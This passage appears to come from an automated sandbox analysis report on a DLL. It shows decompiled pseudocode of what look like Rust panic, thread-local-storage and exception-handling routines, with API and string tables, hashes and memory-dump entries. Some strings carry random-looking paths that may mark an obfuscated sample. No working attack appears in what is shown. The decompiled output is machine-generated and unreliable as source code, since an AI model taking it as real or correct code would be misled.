						_v68 = 0x6e47da50;
						_v64 = 2;
						_v96 = 0;
						_v100 = 0;
						_v60 = 0;
						_v116 = _a4;
						_v112 = _t314;
						_t315 =  &_v68;
						_v80 =  &_v124;
						_v76 = E6E432640;
						_v52 =  &_v80;
						_v48 = 1;
						_t197 = E6E43D2A0( &_v100, __eflags);
						__eflags = _t197 - 3;
						if(_t197 == 3) {
							_v20 = 0;
							_v36 = _t315;
							 *((intOrPtr*)( *((intOrPtr*)(_t315 + 4))))( *_t315);
							_t348 = _t348 + 4;
							L12:
							_t340 = _v36;
							_t307 =  *(_t340 + 4);
							__eflags =  *(4 + _t307);
							if( *(4 + _t307) != 0) {
								HeapFree( *0x6e48adc8, 0, _t259);
							}
							_t197 = HeapFree( *0x6e48adc8, 0, _t340);
						}
						goto L17;
					}
					_t333 =  &_v68;
					_v68 = 0x6e47da14;
					_v64 = 1;
					_v60 = 0;
					_v52 = 0x6e47cd60;
					_v120 = 0;
					_v124 = 0;
					_v48 = 0;
					_t197 = E6E43D2A0( &_v124, __eflags);
					__eflags = _t197 - 3;
					if(_t197 != 3) {
						goto L17;
					} else {
						_v20 = 1;
						_v36 = _t333;
						 *((intOrPtr*)( *((intOrPtr*)(_t333 + 4))))( *_t333);
						_t348 = _t348 + 4;
						goto L12;
					}
				} else {
					_v132 = _t278;
					__imp__AcquireSRWLockShared(0x6e48adbc);
					_v144 = 0x6e48adbc;
					_v20 = 2;
					_v136 = _t268;
					_v140 = _t337;
					_t263 =  *((intOrPtr*)(_t337 + 0x10))(_t268);
					_t348 = _t348 + 4;
					_v36 = _t263;
					_v40 = _t314;
					_t197 = E6E43D1B0(_t268, _t337);
					_t337 = _v40;
					_t352 = _t197;
					if(_t197 != 0) {
						L18:
						__eflags =  *_t197 - 1;
						_t280 = 1;
						if( *_t197 <= 1) {
							_t198 =  *0x6e48adb0; // 0x0
							_t316 = _a8;
							__eflags = _t198 - 2;
							if(_t198 == 2) {
								_t280 = 0;
								goto L20;
							}
							__eflags = _t198 - 1;
							if(_t198 == 1) {
								_t280 = 4;
								goto L20;
							}
							__eflags = _t198;
							if(_t198 != 0) {
								goto L20;
							}
							E6E43D530(_t268,  &_v68, _t337, _t340);
							_t337 = _v40;
							_t251 = _v68;
							__eflags = _t251;
							if(_t251 != 0) {
								goto L69;
							}
							_t271 = 5;
							goto L87;
						}
						_t316 = _a8;
						goto L20;
					} else {
						E6E456EE0(_t268,  &M6E47D0E7, 0x46, _t352,  &_v68, 0x6e47d060, 0x6e47d1ac);
						_t348 = _t348 + 0xc;
						L62:
						asm("ud2");
						L63:
						_t281 = "Box<dyn Any><unnamed>thread \'\' panicked at \'\', ";
						_t204 = 0xc;
						L22:
						_v100 = _t281;
						_v96 = _t204;
						_t205 =  *0x6e48a044; // 0x0
						if(_t205 == 0) {
							_t285 = 0x6e48a044;
							_t205 = E6E442B10(_t268, 0x6e48a044, _t337, _t340);
						}
						_t197 = TlsGetValue(_t205);
						if(_t197 <= 1) {
							L43:
							_t206 =  *0x6e48a044; // 0x0
							__eflags = _t206;
							if(_t206 == 0) {
								_t285 = 0x6e48a044;
								_t206 = E6E442B10(_t268, 0x6e48a044, _t337, _t340);
							}
							_t197 = TlsGetValue(_t206);
							__eflags = _t197;
							if(_t197 == 0) {
								_t207 =  *0x6e48adc8; // 0x260000
								__eflags = _t207;
								if(_t207 != 0) {
									L67:
									_t208 = HeapAlloc(_t207, 0, 0x10);
									__eflags = _t208;
									if(__eflags != 0) {
										 *_t208 = 0;
										 *(_t208 + 0xc) = 0x6e48a044;
										_t340 = _t208;
										_t209 =  *0x6e48a044; // 0x0
										__eflags = _t209;
										if(_t209 == 0) {
											_v36 = _t340;
											_t209 = E6E442B10(_t268, 0x6e48a044, _t337, _t340);
											_t340 = _v36;
										}
										_t197 = TlsSetValue(_t209, _t340);
										goto L76;
									}
									L68:
									_t251 = E6E456C30(_t268, 0x10, 4, _t337, _t340, __eflags);
									asm("ud2");
									L69:
									_t332 = _v60;
									_t303 = _v64;
									__eflags = _t332 - 4;
									if(_t332 == 4) {
										__eflags =  *_t251 - 0x6c6c7566;
										if( *_t251 != 0x6c6c7566) {
											L84:
											_t340 = 2;
											_t271 = 0;
											__eflags = 0;
											L85:
											__eflags = _t303;
											if(_t303 != 0) {
												HeapFree( *0x6e48adc8, 0, _t251);
											}
											L87:
											__eflags = _t271 - 5;
											_t316 = _a8;
											_t273 =  !=  ? _t340 : 1;
											_t280 =  !=  ? _t271 & 0x000000ff : 4;
											_t144 =  !=  ? _t340 : 1;
											_t268 =  *0x6e48adb0;
											 *0x6e48adb0 =  !=  ? _t340 : 1;
											L20:
											_v148 = _t316;
											_v128 = _t280;
											_t61 = _t337 + 0xc; // 0x6e443440
											_t199 =  *_t61;
											_v40 = _t199;
											_t200 =  *_t199(_v36);
											_t348 = _t348 + 4;
											_t318 = _t316 ^ 0x7ef2a91e | _t200 ^ 0xecc7bcf4;
											__eflags = _t318;
											if(__eflags != 0) {
												_t202 = _v40(_v36);
												_t348 = _t348 + 4;
												__eflags = _t318 ^ 0xe43a67d8 | _t202 ^ 0xbae7a625;
												if(__eflags != 0) {
													goto L63;
												}
												_t254 = _v36;
												_t281 =  *_t254;
												_t204 = _t254[2];
												goto L22;
											}
											_t255 = _v36;
											_t281 =  *_t255;
											_t204 = _t255[1];
											goto L22;
										}
										_t271 = 1;
										_t340 = 3;
										goto L85;
									}
									__eflags = _t332 - 1;
									if(_t332 != 1) {
										goto L84;
									}
									__eflags =  *_t251 - 0x30;
									if( *_t251 != 0x30) {
										goto L84;
									}
									_t271 = 4;
									_t340 = 1;
									goto L85;
								}
								_t207 = GetProcessHeap();
								__eflags = _t207;
								if(__eflags == 0) {
									goto L68;
								}
								 *0x6e48adc8 = _t207;
								goto L67;
							} else {
								_t340 = _t197;
								__eflags = _t197 - 1;
								if(_t197 != 1) {
									L76:
									_t282 =  *(_t340 + 8);
									__eflags =  *_t340;
									_t138 = _t340 + 4; // 0x4
									_t337 = _t138;
									 *_t340 = 1;
									 *(_t340 + 4) = 0;
									 *(_t340 + 8) = 0;
									if(__eflags != 0) {
										__eflags = _t282;
										if(__eflags != 0) {
											asm("lock dec dword [ecx]");
											if(__eflags == 0) {
												_t197 = E6E43C800(_t282);
											}
										}
									}
									goto L27;
								}
								_v84 = 0;
								_v36 = 0;
								_t213 = 0;
								__eflags = 0;
								goto L48;
							}
						} else {
							_t337 = _t197;
							if( *_t197 != 1) {
								goto L43;
							}
							_t337 = _t337 + 4;
							L27:
							if( *_t337 != 0) {
								E6E456EE0(_t268, "already borrowedC:tyampmimkkfvlytcfjjwzprktkelbfiygduxwusohmhocuefyyefupvncdqxnbdzpobcxrxttvayruifzxzewqpnxdhtoqxvhptxvtuswthpfrwnzpmyamwgyjpl", 0x10, __eflags,  &_v68, 0x6e47d050, 0x6e47d720);
								_t348 = _t348 + 0xc;
								goto L62;
							}
							 *_t337 = 0xffffffff;
							_t340 =  *(_t337 + 4);
							if(_t340 == 0) {
								_v36 = _t337;
								_v20 = 8;
								_t250 = E6E43C690(_t268, _t337, _t340);
								_t337 = _v36;
								_t340 = _t250;
								_t197 =  *(_t337 + 4);
								_t359 = _t197;
								if(_t359 != 0) {
									asm("lock dec dword [eax]");
									if(_t359 == 0) {
										_t285 =  *(_t337 + 4);
										_t197 = E6E43C800(_t285);
									}
								}
								 *(_t337 + 4) = _t340;
							}
							asm("lock inc dword [esi]");
							if(_t359 <= 0) {
								L17:
								asm("ud2");
								asm("ud2");
								goto L18;
							} else {
								 *_t337 =  *_t337 + 1;
								_v84 = _t340;
								_v36 = _t340;
								if(_t340 != 0) {
									_t212 =  *(_t340 + 0x10);
									__eflags = _t212;
									_t285 =  ==  ? _t212 : _t340 + 0x10;
									if(__eflags != 0) {
										L104:
										_t213 =  *_t285;
										_t285 =  *((intOrPtr*)(_t285 + 4)) - 1;
										L105:
										_v20 = 3;
										L48:
										_v124 = 0x6e47d8fc;
										_v120 = 4;
										_v72 = 0;
										_v88 = 0;
										_v92 = 0;
										_v116 = 0;
										_v20 = 3;
										_t323 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t215 =  !=  ? _t285 : 9;
										_v80 =  !=  ? _t213 : "<unnamed>thread \'\' panicked at \'\', ";
										_t324 =  &_v124;
										_v76 =  !=  ? _t285 : 9;
										_v68 =  &_v80;
										_v64 = 0x6e43de50;
										_v60 =  &_v100;
										_v56 = 0x6e43de50;
										_v52 =  &_v148;
										_v48 = E6E43DE70;
										_v108 =  &_v68;
										_v104 = 3;
										if(E6E43D2A0( &_v92, _t213) == 3) {
											_v20 = 7;
											_v40 = _t324;
											 *((intOrPtr*)( *((intOrPtr*)(_t324 + 4))))( *_t324);
											_t348 = _t348 + 4;
											_t343 = _v40;
											_t300 =  *((intOrPtr*)(_t343 + 4));
											if( *((intOrPtr*)(_t300 + 4)) != 0) {
												_t248 =  *_t343;
												if( *((intOrPtr*)(_t300 + 8)) >= 9) {
													_t248 =  *(_t248 - 4);
												}
												HeapFree( *0x6e48adc8, 0, _t248);
											}
											HeapFree( *0x6e48adc8, 0, _t343);
										}
										_t269 = _v128;
										_t222 =  <  ? (_t269 + 0x000000fd & 0x000000ff) + 1 : 0;
										if(_t222 == 0) {
											"o@,w)@,w"();
											_v68 = 0x6e47d2c0;
											_v64 = 1;
											_v152 = 0x6e48adac;
											_v41 = _t269;
											_v60 = 0;
											_v20 = 6;
											_v124 =  &_v41;
											_v120 = E6E43DEE0;
											_v52 =  &_v124;
											_v48 = 1;
											_t225 = E6E43D2A0( &_v92, __eflags);
											_t341 =  &_v68;
											__imp__ReleaseSRWLockExclusive(0x6e48adac, 0x6e48adac);
											__eflags = _t225 - 3;
											if(__eflags != 0) {
												goto L95;
											}
											_v20 = 5;
											_v40 = _t341;
											 *((intOrPtr*)( *((intOrPtr*)(_t341 + 4))))( *_t341);
											_t348 = _t348 + 4;
											goto L90;
										} else {
											if(_t222 == 1) {
												L95:
												_t372 = _v36;
												if(_t372 != 0) {
													asm("lock dec dword [eax]");
													if(_t372 == 0) {
														E6E43C800(_v84);
													}
												}
												_t342 = _v140;
												_t338 = _v136;
												_t373 = _v72;
												if(_t373 != 0) {
													asm("lock dec dword [eax]");
													if(_t373 == 0) {
														E6E43DC20(_v72);
													}
												}
												__imp__ReleaseSRWLockShared(0x6e48adbc);
												_t374 = _v132 - 1;
												_v20 = 0xffffffff;
												if(_v132 > 1) {
													_v68 = 0x6e47da8c;
													_v64 = 1;
													_v60 = 0;
													_v52 = 0x6e47cd60;
													_v76 = 0;
													_v80 = 0;
													_v48 = 0;
													_t229 = E6E43D2A0( &_v80, _t374);
													_v120 =  &_v68;
													_v124 = _t229;
													E6E43D460( &_v124);
													asm("ud2");
													asm("ud2");
												}
												_t285 = _t338;
												E6E43D440(_t285, _t342);
												asm("ud2");
												goto L104;
											}
											 *0x6e48a040 = 0;
											_t368 =  *0x6e48a040;
											if( *0x6e48a040 == 0) {
												goto L95;
											}
											_t330 =  &_v68;
											_v68 = 0x6e47d96c;
											_v64 = 1;
											_v60 = 0;
											_v52 = 0x6e47cd60;
											_v48 = 0;
											_v20 = 3;
											if(E6E43D2A0( &_v92, _t368) != 3) {
												goto L95;
											}
											_v40 = _t330;
											_v20 = 4;
											 *((intOrPtr*)( *((intOrPtr*)(_t330 + 4))))( *_t330);
											_t348 = _t348 + 4;
											L90:
											_t296 =  *((intOrPtr*)(_v40 + 4));
											if( *((intOrPtr*)(_t296 + 4)) != 0) {
												_t238 =  *_v40;
												if( *((intOrPtr*)(_t296 + 8)) >= 9) {
													_t238 =  *(_t238 - 4);
												}
												HeapFree( *0x6e48adc8, 0, _t238);
											}
											HeapFree( *0x6e48adc8, 0, _v40);
											goto L95;
										}
									}
									_t213 = 0;
									goto L105;
								}
								_t213 = 0;
								goto L48;
							}
						}
					}
				}
			}

0x6e43c897
0x6e43c89a
0x6e43c89e
0x6e43c8a5
0x6e43c8a6
0x6e43c8a8
0x6e43c8ad
0x6e43c8b0
0x6e43c8b2
0x6e43c8b3
0x6e43c8b4
0x6e43c8b5
0x6e43c8b6
0x6e43c8b7
0x6e43c8b8
0x6e43c8b9
0x6e43c8ba
0x6e43c8bb
0x6e43c8bc
0x6e43c8bd
0x6e43c8be
0x6e43c8bf
0x6e43c8c6
0x6e43c8cc
0x6e43c8cf
0x6e43c8d6
0x6e43c8dd
0x6e43c8e2
0x6e43c8e7
0x6e43c8f0
0x6e43c8f3
0x6e43c8f9
0x6e43c901
0x6e43c906
0x6e43c908
0x6e43c922
0x6e43c927
0x6e43c92a
0x6e43c92a
0x6e43c92e
0x6e43c931
0x6e43c934
0x6e43c936
0x6e43c9aa
0x6e43c9ad
0x6e43ca0a
0x6e43ca11
0x6e43ca1b
0x6e43ca22
0x6e43ca29
0x6e43ca2d
0x6e43ca34
0x6e43ca3b
0x6e43ca41
0x6e43ca44
0x6e43ca47
0x6e43ca4d
0x6e43ca54
0x6e43ca57
0x6e43ca5e
0x6e43ca63
0x6e43ca65
0x6e43ca6c
0x6e43ca74
0x6e43ca77
0x6e43ca79
0x6e43ca7c
0x6e43ca7c
0x6e43ca7f
0x6e43ca82
0x6e43ca86
0x6e43ca9c
0x6e43ca9c
0x6e43caaa
0x6e43caaa
0x00000000
0x6e43ca65
0x6e43c9b2
0x6e43c9b5
0x6e43c9bc
0x6e43c9c3
0x6e43c9ca
0x6e43c9d1
0x6e43c9d5
0x6e43c9dc
0x6e43c9e3
0x6e43c9e8
0x6e43c9ea
0x00000000
0x6e43c9f0
0x6e43c9f5
0x6e43c9fd
0x6e43ca00
0x6e43ca02
0x00000000
0x6e43ca02
0x6e43c93d
0x6e43c93d
0x6e43c945
0x6e43c94b
0x6e43c955
0x6e43c95c
0x6e43c963
0x6e43c969
0x6e43c96c
0x6e43c96f
0x6e43c972
0x6e43c975
0x6e43c97a
0x6e43c97d
0x6e43c97f
0x6e43cab3
0x6e43cab3
0x6e43cab6
0x6e43cab8
0x6e43cb8b
0x6e43cb90
0x6e43cb93
0x6e43cb96
0x6e43cd97
0x00000000
0x6e43cd97
0x6e43cb9c
0x6e43cb9f
0x6e43cd90
0x00000000
0x6e43cd90
0x6e43cba5
0x6e43cba7
0x00000000
0x00000000
0x6e43cbb0
0x6e43cbb5
0x6e43cbb8
0x6e43cbbb
0x6e43cbbd
0x00000000
0x00000000
0x6e43cbc3
0x00000000
0x6e43cbc3
0x6e43cabe
0x00000000
0x6e43c985
0x6e43c99d
0x6e43c9a2
0x6e43cdbe
0x6e43cdbe
0x6e43cdc0
0x6e43cdc0
0x6e43cdc5
0x6e43caf3
0x6e43caf3
0x6e43caf6
0x6e43caf9
0x6e43cb00
0x6e43cb02
0x6e43cb07
0x6e43cb07
0x6e43cb0d
0x6e43cb16
0x6e43cbf3
0x6e43cbf3
0x6e43cbf8
0x6e43cbfa
0x6e43cbfc
0x6e43cc01
0x6e43cc01
0x6e43cc07
0x6e43cc0d
0x6e43cc0f
0x6e43cdcf
0x6e43cdd4
0x6e43cdd6
0x6e43cde6
0x6e43cdeb
0x6e43cdf0
0x6e43cdf2
0x6e43ce32
0x6e43ce38
0x6e43ce3f
0x6e43ce41
0x6e43ce46
0x6e43ce48
0x6e43ce4f
0x6e43ce52
0x6e43ce57
0x6e43ce57
0x6e43ce5c
0x00000000
0x6e43ce5c
0x6e43cdf4
0x6e43cdfe
0x6e43ce03
0x6e43ce05
0x6e43ce05
0x6e43ce08
0x6e43ce0b
0x6e43ce0e
0x6e43ceb8
0x6e43cebe
0x6e43cec9
0x6e43cec9
0x6e43cece
0x6e43cece
0x6e43ced0
0x6e43ced0
0x6e43ced2
0x6e43cedd
0x6e43cedd
0x6e43cee2
0x6e43cee2
0x6e43ceed
0x6e43cef5
0x6e43cef8
0x6e43cefb
0x6e43cefb
0x6e43cefb
0x6e43cac1
0x6e43cac1
0x6e43cac7
0x6e43caca
0x6e43caca
0x6e43cad0
0x6e43cad3
0x6e43cad5
0x6e43cae3
0x6e43cae3
0x6e43cae5
0x6e43cbcd
0x6e43cbd0
0x6e43cbde
0x6e43cbe0
0x00000000
0x00000000
0x6e43cbe6
0x6e43cbe9
0x6e43cbeb
0x00000000
0x6e43cbeb
0x6e43caeb
0x6e43caee
0x6e43caf0
0x00000000
0x6e43caf0
0x6e43cec0
0x6e43cec2
0x00000000
0x6e43cec2
0x6e43ce14
0x6e43ce17
0x00000000
0x00000000
0x6e43ce1d
0x6e43ce20
0x00000000
0x00000000
0x6e43ce26
0x6e43ce28
0x00000000
0x6e43ce28
0x6e43cdd8
0x6e43cddd
0x6e43cddf
0x00000000
0x00000000
0x6e43cde1
0x00000000
0x6e43cc15
0x6e43cc15
0x6e43cc17
0x6e43cc1a
0x6e43ce62
0x6e43ce62
0x6e43ce65
0x6e43ce68
0x6e43ce68
0x6e43ce6b
0x6e43ce71
0x6e43ce78
0x6e43ce7f
0x6e43ce85
0x6e43ce87
0x6e43ce8d
0x6e43ce90
0x6e43ce96
0x6e43ce96
0x6e43ce90
0x6e43ce87
0x00000000
0x6e43ce7f
0x6e43cc20
0x6e43cc27
0x6e43cc2e
0x6e43cc2e
0x00000000
0x6e43cc2e
0x6e43cb1c
0x6e43cb1f
0x6e43cb21
0x00000000
0x00000000
0x6e43cb27
0x6e43cb2a
0x6e43cb2d
0x6e43cdb6
0x6e43cdbb
0x00000000
0x6e43cdbb
0x6e43cb33
0x6e43cb39
0x6e43cb3e
0x6e43cb40
0x6e43cb43
0x6e43cb4a
0x6e43cb4f
0x6e43cb52
0x6e43cb54
0x6e43cb57
0x6e43cb59
0x6e43cb5b
0x6e43cb5e
0x6e43cb60
0x6e43cb63
0x6e43cb63
0x6e43cb5e
0x6e43cb68
0x6e43cb68
0x6e43cb6b
0x6e43cb6e
0x6e43caaf
0x6e43caaf
0x6e43cab1
0x00000000
0x6e43cb74
0x6e43cb74
0x6e43cb78
0x6e43cb7b
0x6e43cb7e
0x6e43cea0
0x6e43cea6
0x6e43cea8
0x6e43ceab
0x6e43d062
0x6e43d062
0x6e43d067
0x6e43d068
0x6e43d068
0x6e43cc30
0x6e43cc37
0x6e43cc3e
0x6e43cc45
0x6e43cc4c
0x6e43cc50
0x6e43cc57
0x6e43cc5e
0x6e43cc65
0x6e43cc6d
0x6e43cc70
0x6e43cc76
0x6e43cc79
0x6e43cc7f
0x6e43cc85
0x6e43cc8c
0x6e43cc95
0x6e43cc9c
0x6e43cca2
0x6e43cca9
0x6e43ccac
0x6e43ccba
0x6e43ccc1
0x6e43ccc9
0x6e43cccc
0x6e43ccce
0x6e43ccd1
0x6e43ccd4
0x6e43ccdb
0x6e43ccdd
0x6e43cce3
0x6e43cce5
0x6e43cce5
0x6e43ccf1
0x6e43ccf1
0x6e43ccff
0x6e43ccff
0x6e43cd04
0x6e43cd15
0x6e43cd1a
0x6e43cf0b
0x6e43cf1a
0x6e43cf21
0x6e43cf28
0x6e43cf32
0x6e43cf35
0x6e43cf3c
0x6e43cf43
0x6e43cf49
0x6e43cf50
0x6e43cf53
0x6e43cf5a
0x6e43cf5f
0x6e43cf68
0x6e43cf6e
0x6e43cf71
0x00000000
0x00000000
0x6e43cf78
0x6e43cf80
0x6e43cf83
0x6e43cf85
0x00000000
0x6e43cd20
0x6e43cd23
0x6e43cfc0
0x6e43cfc3
0x6e43cfc5
0x6e43cfc7
0x6e43cfca
0x6e43cfcf
0x6e43cfcf
0x6e43cfca
0x6e43cfd7
0x6e43cfdd
0x6e43cfe3
0x6e43cfe5
0x6e43cfe7
0x6e43cfea
0x6e43cfef
0x6e43cfef
0x6e43cfea
0x6e43cff9
0x6e43cfff
0x6e43d003
0x6e43d00a
0x6e43d012
0x6e43d019
0x6e43d020
0x6e43d027
0x6e43d02e
0x6e43d032
0x6e43d039
0x6e43d040
0x6e43d048
0x6e43d04b
0x6e43d04e
0x6e43d053
0x6e43d055
0x6e43d055
0x6e43d057
0x6e43d05b
0x6e43d060
0x00000000
0x6e43d060
0x6e43cd2b
0x6e43cd31
0x6e43cd33
0x00000000
0x00000000
0x6e43cd3c
0x6e43cd3f
0x6e43cd46
0x6e43cd4d
0x6e43cd54
0x6e43cd5b
0x6e43cd62
0x6e43cd70
0x00000000
0x00000000
0x6e43cd7b
0x6e43cd7e
0x6e43cd86
0x6e43cd88
0x6e43cf88
0x6e43cf8b
0x6e43cf92
0x6e43cf9b
0x6e43cf9d
0x6e43cf9f
0x6e43cf9f
0x6e43cfab
0x6e43cfab
0x6e43cfbb
0x00000000
0x6e43cfbb
0x6e43cd1a
0x6e43ceb1
0x00000000
0x6e43ceb1
0x6e43cb84
0x00000000
0x6e43cb84
0x6e43cb6e
0x6e43cb16
0x6e43c97f

APIs

Part of subcall function 6E43C8C0: AcquireSRWLockShared.KERNEL32(6E48ADBC), ref: 6E43C945

HeapFree.KERNEL32(00000000,00000000), ref: 6E43CA9C
HeapFree.KERNEL32(00000000,?), ref: 6E43CAAA
TlsGetValue.KERNEL32 ref: 6E43CB0D
HeapFree.KERNEL32(00000000,00000000), ref: 6E43CCF1
HeapFree.KERNEL32(00000000,?), ref: 6E43CCFF

Strings

Box<dyn Any><unnamed>thread '' panicked at '', , xrefs: 6E43CDC0
cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf, xrefs: 6E43C90D, 6E43C988
Y3Dn, xrefs: 6E43C8C5

Memory Dump Source

Source File: 00000003.00000002.558085092.000000006E431000.00000020.00020000.sdmp, Offset: 6E430000, based on PE: true

Associated: 00000003.00000002.558081683.000000006E430000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558100224.000000006E458000.00000002.00020000.sdmp Download File
Associated: 00000003.00000002.558118040.000000006E48A000.00000004.00020000.sdmp Download File
Associated: 00000003.00000002.558121483.000000006E48C000.00000008.00020000.sdmp Download File
Associated: 00000003.00000002.558124437.000000006E48D000.00000002.00020000.sdmp Download File

Similarity

API ID: FreeHeap$AcquireLockSharedValue
String ID: Box<dyn Any><unnamed>thread '' panicked at '', $Y3Dn$cannot access a Thread Local Storage value during or after destructionC:jhdokdvbachceydqtheqlppakhgzijyekeivcljjvbkvyjmwyqejgcsvnqcbhbexvfcyaikjiycwgbjpytkvctpgymeigmgnvityoxcirvtcevutdotfqbgtduf
API String ID: 942675266-3785297964
Opcode ID: e18ca1606bd12821a6268af1eccd602c04ff37252bc5e0523838f8bb45f83c38
Instruction ID: 82c8547fd24b27c9d8b9a2ef95fc63a8cbed96a6a3853feaad09c7860bfdd686
Opcode Fuzzy Hash: e18ca1606bd12821a6268af1eccd602c04ff37252bc5e0523838f8bb45f83c38
Instruction Fuzzy Hash: 730225B0A006298FDB10DFF5C854B9EBBB5FF49319F20851AD415AB380DB75A946CFA0

Uniqueness

Uniqueness Score: -1.00%

Function 6E44D036, Relevance: 17.8, APIs: 6, Strings: 4, Instructions: 304
COMMON

Download Yara Rule

C-Code - Quality: 64%

			E6E44D036(signed int __edx, signed char* _a4, signed int _a8, signed int _a12, char _a16, signed int* _a20, signed int _a24, signed int _a28, signed int _a32) {
				signed char* _v0;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				intOrPtr _v24;
				char _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				signed int _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				void _v64;
				signed int _v68;
				char _v84;
				intOrPtr _v88;
				signed int _v92;
				intOrPtr _v100;
				void _v104;
				intOrPtr* _v112;
				signed char* _v184;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t202;
				signed int _t203;
				char _t204;
				signed int _t206;
				signed int _t208;
				signed char* _t209;
				signed int _t210;
				signed int _t211;
				signed int _t215;
				void* _t218;
				signed char* _t221;
				void* _t223;
				void* _t225;
				signed char _t229;
				signed int _t230;
				void* _t232;
				void* _t235;
				void* _t238;
				signed char _t245;
				signed int _t250;
				void* _t253;
				signed int* _t255;
				signed int _t256;
				intOrPtr _t257;
				signed int _t258;
				void* _t263;
				void* _t268;
				void* _t269;
				signed int _t273;
				signed char* _t274;
				intOrPtr* _t275;
				signed char _t276;
				signed int _t277;
				signed int _t278;
				intOrPtr* _t280;
				signed int _t281;
				signed int _t282;
				signed int _t287;
				signed int _t294;
				signed int _t295;
				signed int _t298;
				signed int _t300;
				signed char* _t301;
				signed int _t302;
				signed int _t303;
				signed int* _t305;
				signed char* _t308;
				signed int _t318;
				signed int _t319;
				signed int _t321;
				signed int _t330;
				void* _t332;
				void* _t334;
				void* _t335;
				void* _t336;
				void* _t337;

				_t300 = __edx;
				_push(_t319);
				_t305 = _a20;
				_v20 = 0;
				_v28 = 0;
				_t279 = E6E44DF98(_a8, _a16, _t305);
				_t335 = _t334 + 0xc;
				_v12 = _t279;
				if(_t279 < 0xffffffff || _t279 >= _t305[1]) {
					L66:
					_t202 = E6E44F563(_t274, _t279, _t300, _t305, _t319);
					asm("int3");
					_t332 = _t335;
					_t336 = _t335 - 0x38;
					_push(_t274);
					_t275 = _v112;
					__eflags =  *_t275 - 0x80000003;
					if( *_t275 == 0x80000003) {
						return _t202;
					} else {
						_push(_t319);
						_push(_t305);
						_t203 = E6E44CCF1(_t275, _t279, _t300, _t305, _t319);
						__eflags =  *(_t203 + 8);
						if( *(_t203 + 8) != 0) {
							__imp__EncodePointer(0);
							_t319 = _t203;
							_t223 = E6E44CCF1(_t275, _t279, _t300, 0, _t319);
							__eflags =  *((intOrPtr*)(_t223 + 8)) - _t319;
							if( *((intOrPtr*)(_t223 + 8)) != _t319) {
								__eflags =  *_t275 - 0xe0434f4d;
								if( *_t275 != 0xe0434f4d) {
									__eflags =  *_t275 - 0xe0434352;
									if( *_t275 != 0xe0434352) {
										_t215 = E6E44C537(_t300, 0, _t319, _t275, _a4, _a8, _a12, _a16, _a24, _a28);
										_t336 = _t336 + 0x1c;
										__eflags = _t215;
										if(_t215 != 0) {
											L83:
											return _t215;
										}
									}
								}
							}
						}
						_t204 = _a16;
						_v28 = _t204;
						_v24 = 0;
						__eflags =  *(_t204 + 0xc);
						if( *(_t204 + 0xc) > 0) {
							_push(_a24);
							E6E44C46A(_t275, _t279, 0, _t319,  &_v44,  &_v28, _a20, _a12, _t204);
							_t302 = _v40;
							_t337 = _t336 + 0x18;
							_t215 = _v44;
							_v20 = _t215;
							_v12 = _t302;
							__eflags = _t302 - _v32;
							if(_t302 >= _v32) {
								goto L83;
							}
							_t281 = _t302 * 0x14;
							__eflags = _t281;
							_v16 = _t281;
							do {
								_t282 = 5;
								_t218 = memcpy( &_v64,  *((intOrPtr*)( *_t215 + 0x10)) + _t281, _t282 << 2);
								_t337 = _t337 + 0xc;
								__eflags = _v64 - _t218;
								if(_v64 > _t218) {
									goto L82;
								}
								__eflags = _t218 - _v60;
								if(_t218 > _v60) {
									goto L82;
								}
								_t221 = _v48 + 0xfffffff0 + (_v52 << 4);
								_t287 = _t221[4];
								__eflags = _t287;
								if(_t287 == 0) {
									L80:
									__eflags =  *_t221 & 0x00000040;
									if(( *_t221 & 0x00000040) == 0) {
										_push(0);
										_push(1);
										E6E44CFB6(_t302, _t275, _a4, _a8, _a12, _a16, _t221, 0,  &_v64, _a24, _a28);
										_t302 = _v12;
										_t337 = _t337 + 0x30;
									}
									goto L82;
								}
								__eflags =  *((char*)(_t287 + 8));
								if( *((char*)(_t287 + 8)) != 0) {
									goto L82;
								}
								goto L80;
								L82:
								_t302 = _t302 + 1;
								_t215 = _v20;
								_t281 = _v16 + 0x14;
								_v12 = _t302;
								_v16 = _t281;
								__eflags = _t302 - _v32;
							} while (_t302 < _v32);
							goto L83;
						}
						E6E44F563(_t275, _t279, _t300, 0, _t319);
						asm("int3");
						_push(_t332);
						_t301 = _v184;
						_push(_t275);
						_push(_t319);
						_push(0);
						_t206 = _t301[4];
						__eflags = _t206;
						if(_t206 == 0) {
							L108:
							_t208 = 1;
							__eflags = 1;
						} else {
							_t280 = _t206 + 8;
							__eflags =  *_t280;
							if( *_t280 == 0) {
								goto L108;
							} else {
								__eflags =  *_t301 & 0x00000080;
								_t308 = _v0;
								if(( *_t301 & 0x00000080) == 0) {
									L90:
									_t276 = _t308[4];
									_t321 = 0;
									__eflags = _t206 - _t276;
									if(_t206 == _t276) {
										L100:
										__eflags =  *_t308 & 0x00000002;
										if(( *_t308 & 0x00000002) == 0) {
											L102:
											_t209 = _a4;
											__eflags =  *_t209 & 0x00000001;
											if(( *_t209 & 0x00000001) == 0) {
												L104:
												__eflags =  *_t209 & 0x00000002;
												if(( *_t209 & 0x00000002) == 0) {
													L106:
													_t321 = 1;
													__eflags = 1;
												} else {
													__eflags =  *_t301 & 0x00000002;
													if(( *_t301 & 0x00000002) != 0) {
														goto L106;
													}
												}
											} else {
												__eflags =  *_t301 & 0x00000001;
												if(( *_t301 & 0x00000001) != 0) {
													goto L104;
												}
											}
										} else {
											__eflags =  *_t301 & 0x00000008;
											if(( *_t301 & 0x00000008) != 0) {
												goto L102;
											}
										}
										_t208 = _t321;
									} else {
										_t185 = _t276 + 8; // 0x6e
										_t210 = _t185;
										while(1) {
											_t277 =  *_t280;
											__eflags = _t277 -  *_t210;
											if(_t277 !=  *_t210) {
												break;
											}
											__eflags = _t277;
											if(_t277 == 0) {
												L96:
												_t211 = _t321;
											} else {
												_t278 =  *((intOrPtr*)(_t280 + 1));
												__eflags = _t278 -  *((intOrPtr*)(_t210 + 1));
												if(_t278 !=  *((intOrPtr*)(_t210 + 1))) {
													break;
												} else {
													_t280 = _t280 + 2;
